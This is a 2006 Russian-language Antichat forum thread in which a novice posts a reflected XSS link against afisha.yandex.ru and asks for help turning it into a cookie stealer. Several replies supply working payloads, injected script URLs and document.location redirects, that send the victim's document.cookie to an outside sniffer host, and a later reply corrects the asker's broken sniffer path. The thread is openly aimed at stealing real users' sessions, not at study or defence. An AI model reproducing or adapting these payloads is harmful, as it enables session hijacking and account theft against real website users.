HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xss на яндексе... Требуеца помощь
  #1  
Старый 18.12.2006, 02:35
IDentety
Познающий
Регистрация: 13.12.2006
Сообщений: 77
С нами: 10215346

Репутация: 70
Question Xss на яндексе... Требуеца помощь

PHP код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E 
Вот наша хсска... Нам нада составить ее так чтобы логи шли на сниффер... Народ, кому не лень составьте пожалуйста четкую ссылку на сниффер античата... Долблюсь ап стену уже 3 час и нифига не пойму где у меня ошибка.... Если распишите все поэтапно буду очень благодарен... В любом случае с меня + к репе!


Извиняюсь за тупые вопросы в ХSS еще плохо разбираюсь поэтому йад и стены прошу не прописывать
 
Ответить с цитированием

  #2  
Старый 18.12.2006, 02:39
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию

http://forum.antichat.ru/thread19610.html
 
Ответить с цитированием

  #3  
Старый 18.12.2006, 03:42
IDentety
Познающий
Регистрация: 13.12.2006
Сообщений: 77
С нами: 10215346

Репутация: 70
По умолчанию

Просмотрел почти все темы... В принципе уяснил что к чему, но опять же в теории все слишком аморфно.. На рпактике все гораздо сложнее... Всеже попрошу составить скрипт по крайней мере для наглядности...
 
Ответить с цитированием

  #4  
Старый 18.12.2006, 04:34
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
С нами: 10374086

Репутация: 1745


По умолчанию

Цитата:
Просмотрел почти все темы... В принципе уяснил что к чему, но опять же в теории все слишком аморфно.. На рпактике все гораздо сложнее... Всеже попрошу составить скрипт по крайней мере для наглядности...
ЗА чем тебе писать или искать скрипт, просто на форуме есть тема где их выкладывают!
 
Ответить с цитированием

  #5  
Старый 18.12.2006, 04:50
IDentety
Познающий
Регистрация: 13.12.2006
Сообщений: 77
С нами: 10215346

Репутация: 70
По умолчанию

да я имею ввиду применение скрипта. ну допустим мне нада составить его так чтобы он таскал куки на мой снифер на античате. приведите мне пример на этой xss.
 
Ответить с цитированием

  #6  
Старый 18.12.2006, 05:07
IDentety
Познающий
Регистрация: 13.12.2006
Сообщений: 77
С нами: 10215346

Репутация: 70
По умолчанию

вобщем даже вот в чем суть вопроса- помогите составить корректный запрос чтобы с этого адреса куки уходили на сниффер...
 
Ответить с цитированием

  #7  
Старый 18.12.2006, 07:21
Retscan
Познающий
Регистрация: 17.12.2006
Сообщений: 32
С нами: 10210061

Репутация: 31
По умолчанию

Цитата:
Сообщение от IDentety  
PHP код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E 
Вот наша хсска... Нам нада составить ее так чтобы логи шли на сниффер... Народ, кому не лень составьте пожалуйста четкую ссылку на сниффер античата... Долблюсь ап стену уже 3 час и нифига не пойму где у меня ошибка.... Если распишите все поэтапно буду очень благодарен... В любом случае с меня + к репе!


Извиняюсь за тупые вопросы в ХSS еще плохо разбираюсь поэтому йад и стены прошу не прописывать
На, лови:
Код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;></script%3E
Плюс не забудь
 
Ответить с цитированием

  #8  
Старый 18.12.2006, 10:10
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами: 10243046

Репутация: 3033


По умолчанию

Можешь соорудить что нибудь этакое
<script>document.location="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie</script>
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Последний раз редактировалось Constantine; 18.12.2006 в 10:21..
 
Ответить с цитированием

  #9  
Старый 18.12.2006, 10:33
IDentety
Познающий
Регистрация: 13.12.2006
Сообщений: 77
С нами: 10215346

Репутация: 70
По умолчанию

вот соорудил я конструкцию такого вида

http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript %20src=%22http://antichat.ru/s/мойсниф.jpg?%22+document.cookie;%3E%3C/script%3E

но отчеты не приходят.. видно гдето абшибся
 
Ответить с цитированием

  #10  
Старый 18.12.2006, 10:40
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами: 10243046

Репутация: 3033


По умолчанию

Тык неправельно ты адрес задал, надо не ../s/yoursniff.jpg а .../cgi-bin/yoursnif.jpg
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Веб-уязвимости 519 23.09.2021 11:44
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Помощь с putty aX0en С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 7 23.06.2009 14:52
Xss на яндексе, помогите составить корректный запрос. red1rect Уязвимости 7 22.03.2006 14:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.